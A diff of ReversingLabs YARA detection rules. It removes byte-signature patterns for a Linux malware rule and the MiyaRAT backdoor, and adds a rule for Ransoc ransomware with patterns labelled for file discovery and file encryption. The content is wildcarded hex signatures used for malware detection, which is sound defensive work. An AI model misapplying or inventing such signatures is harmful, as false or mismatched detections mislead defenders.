-            ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE
-            0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
-            83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F
-            85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 48 81
-            C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
-        }
-		$persistence_mechanism_redhat_v7 = {
-            48 89 6C 24 ?? 4C 89 7C 24 ?? 48 89 5C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 4C 89 74
-            24 ?? 48 81 EC ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 8B 7D ?? 4C
-            8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C 24 ?? 48 89 EE
-            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74 24 ?? 4C 89 E2
-            E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8 ?? ?? ?? ?? 48
-            8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E1 4C 89 E2 BE ?? ?? ?? ?? 48 89
-            DF 49 89 E9 4D 89 E0 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C5 B9 ?? ?? ?? ?? 89
-            C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
-            ?? 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF 31 C0 E8 ?? ?? ?? ?? 48 98 48 89 E7 31 C9 C6 04
-            18 ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 2C 24 BE ?? ?? ?? ?? 48 89 EF E8
-            ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 DF 48 8D 5D ?? BD ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 39 EB 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 39 DD 0F 85 ?? ?? ??
-            ?? 49 8D 5C 24 ?? 48 39 DD 0F 85 ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B B4 24 ??
-            ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF
+            15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ??
+            ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ??
+            ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ??
+            74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2
+            50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD
+            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ??
+            ?? 8B E5 5D C3
         }
-		$get_device_name_v7 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? BE ?? ?? ?? ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? B9 ?? ??
-            ?? ?? 4C 89 74 24 ?? 48 81 EC ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8D 5C 24 ?? BA ??
-            ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
-            ?? 41 BD ?? ?? ?? ?? 48 83 EB ?? 4C 39 EB 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            83 78 ?? ?? 75 ?? 48 8D 5C 24 ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE BF ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 8B 15 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ??
-            E8 ?? ?? ?? ?? 4C 8B 64 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 8B 2C 24 48 8D 5C 24 ?? 41
-            B8 ?? ?? ?? ?? 4C 89 E2 BE ?? ?? ?? ?? 31 C0 48 89 DF 48 89 E9 E8 ?? ?? ?? ?? 48 89
-            DE BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 5D ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5C 24 ?? 49 39 DD 0F
-            85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 4C 8B B4
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50
+            89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55
+            ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
+            C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B
+            1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF
+            D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ??
+            ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0
+            74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89
+            33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF
+            15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
         }
-		$generate_machine_id_v7 = {
-            41 57 31 C9 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC
-            ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ??
-            48 8B B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 31 C9 BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ??
-            48 8B B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C
-            8B B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 89 C6 48 8D BC 24 ?? ?? ?? ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ??
-            ?? ?? ?? 29 D5 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 F1 BE ??
-            ?? ?? ?? 48 89 E7 41 BD ?? ?? ?? ?? 48 89 DA 48 83 EB ?? E8 ?? ?? ?? ?? 4C 39 EB 89
-            C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04
-            04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 E6 4C 89 FF E8 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 49 8D 5E ?? 49 39
-            DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
-            ?? 48 83 EB ?? 49 39 DD 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 4C 89 F8 5B 5D 41 5C
-            41 5D 41 5E 41 5F C3
+		$encrypt_files_p2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ??
+            6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0
+            56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B
+            00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ??
+            72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D
+            8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( $persistence_mechanism_ubuntu ) and ( all of ( $network_communication_* ) ) and ( ( ( $change_timestamp_and_read_config_v11 ) and ( $persistence_mechanism_redhat_v11 ) and ( $generate_machine_id_v11 ) ) or ( ( $persistence_mechanism_redhat_v7 ) and ( $get_device_name_v7 ) and ( $generate_machine_id_v7 ) ) ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Win64_Backdoor_Miyarat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects MiyaRAT backdoor."
+		description = "Yara rule that detects Ransoc ransomware."
 		author = "ReversingLabs"
-		id = "1c5ae79a-9760-5622-909c-76bb47721ed4"
-		date = "2025-02-27"
-		modified = "2025-02-27"
+		id = "a990754e-eafa-5501-a123-bcbd5aa26ca6"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.MiyaRAT.yara#L1-L264"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a06deed11a7bdaa17b4cb69da1bd66ff2f2072af8cf4081f7481a51e4567135d"
+		logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "MiyaRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ransoc"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$get_disk_information_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 0F
-            29 70 ?? 0F 29 78 ?? 44 0F 29 40 ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
-            ?? ?? 48 8B D9 48 89 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 45 33 ED 45 8B E5 44
-            89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 89 84 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ??
-            ?? ?? 0F 57 C9 F3 0F 7F 8C 24 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 85 F6 75 ?? 0F 57 C0 0F 11 03 4C 89 6B ?? 4C 89 6B ??
-            41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 90 48 8B 94 24 ?? ??
-            ?? ?? 48 83 FA ?? 0F 86 ?? ?? ?? ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B0 ?? 48 BF ?? ?? ?? ?? ?? ?? ?? ?? F2 44
-            0F 10 05 ?? ?? ?? ?? 88 44 24 ?? 3C ?? 0F 8F ?? ?? ?? ?? 0F BE D0 8D 4A ?? 0F B6 C1
-            0F A3 C6 0F 83 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7
-            44 24 ?? ?? ?? ?? ?? 0F B6 C2 88 44 24 ?? C6 44 24 ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ?? ?? ?? ?? 4C 89 AC
-            24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 0F 10 48 ??
-            0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 83 CC ?? 44
-            89 64 24 ?? 48 8B 54 24 ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24
-        }
-		$get_disk_information_p2 = {
-            48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B D8 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 48 0F 47 8C 24
-            ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 83 BC 24 ?? ??
-            ?? ?? ?? 48 0F 47 8C 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ??
-            48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89
-            44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 0F 57 FF 48 85 C9 78 ?? F2
-            48 0F 2A F9 EB ?? 48 8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F8 F2 0F 58 FF F2
-            41 0F 59 F8 48 8B 8C 24 ?? ?? ?? ?? 0F 57 F6 48 85 C9 78 ?? F2 48 0F 2A F1 EB ?? 48
-            8B C1 48 D1 E8 83 E1 ?? 48 0B C1 F2 48 0F 2A F0 F2 0F 58 F6 F2 41 0F 59 F0 33 D2 41
-            B8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 4C 8D 8C 24 ?? ?? ?? ?? 49 FF C9 B8 ?? ?? ?? ?? F7 E3 C1 EA ?? 0F B6 C2
-            C0 E0 ?? 8D 0C 10 02 C9 2A D9 80 C3 ?? 41 88 19 8B DA 85 D2 75 ?? 4C 8D 84 24 ?? ??
-            ?? ?? 49 8B D1 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 CC ?? 44 89 64 24 ?? 48
-        }
-		$get_disk_information_p3 = {
-            8B B4 24 ?? ?? ?? ?? 48 8B C7 48 2B C6 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D BC 24 ??
-            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 4C 0F 47 BC 24 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24
-            ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 8D 76 ?? BF ?? ?? ??
-            ?? 48 8D 9C 24 ?? ?? ?? ?? 4C 3B F7 0F 86 ?? ?? ?? ?? 49 8B FE 48 83 CF ?? 48 B8 ??
-            ?? ?? ?? ?? ?? ?? ?? 48 3B F8 76 ?? 48 8B F8 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 83 C0
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 58 ?? 48 83 E3 ?? 48 89
-            43 ?? EB ?? 48 83 FF ?? B8 ?? ?? ?? ?? 48 0F 42 F8 48 8D 4F ?? 48 85 C9 75 ?? 49 8B
-            DD EB ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? EB ?? E8
-            ?? ?? ?? ?? 48 8B D8 48 89 9C 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ??
-            ?? ?? ?? 4C 8B C6 49 8B D7 48 8B CB E8 ?? ?? ?? ?? 66 C7 04 33 ?? ?? 42 C6 04 33 ??
-            41 83 CC ?? 44 89 64 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89
-            6C 24 ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ??
-            4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00 ?? 41 0F BA EC ?? 44 89 64 24 ?? 48 8D 84
-            24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 49 FF C0 42 80 3C 00
-        }
-		$get_disk_information_p4 = {
-            75 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 84 24 ??
-            ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ??
-            ?? ?? 0F 10 48 ?? 0F 11 8C 24 ?? ?? ?? ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ?? C6 00
-            ?? 41 0F BA EC ?? 44 89 64 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 0F
-            10 00 0F 11 44 24 ?? 0F 10 48 ?? 0F 11 4C 24 ?? 4C 89 68 ?? 48 C7 40 ?? ?? ?? ?? ??
-            C6 00 ?? 41 83 CC ?? 44 89 64 24 ?? 48 8D 54 24 ?? 48 83 7C 24 ?? ?? 48 0F 47 54 24
-            ?? 4C 8B 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? 48 83 FA
-            ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48
-            8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 6C
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ??
-            76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48
-            8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 4C 24 ?? 48 8B C1 48 81 FA ??
-            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 44 24 ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B
-        }
-		$get_disk_information_p5 = {
-            C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8
-            ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF
-            C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 94 24
-            ?? ?? ?? ?? 48 83 FA ?? 76 ?? 48 FF C2 48 8B 8C 24 ?? ?? ?? ?? 48 8B C1 48 81 FA ??
-            ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ??
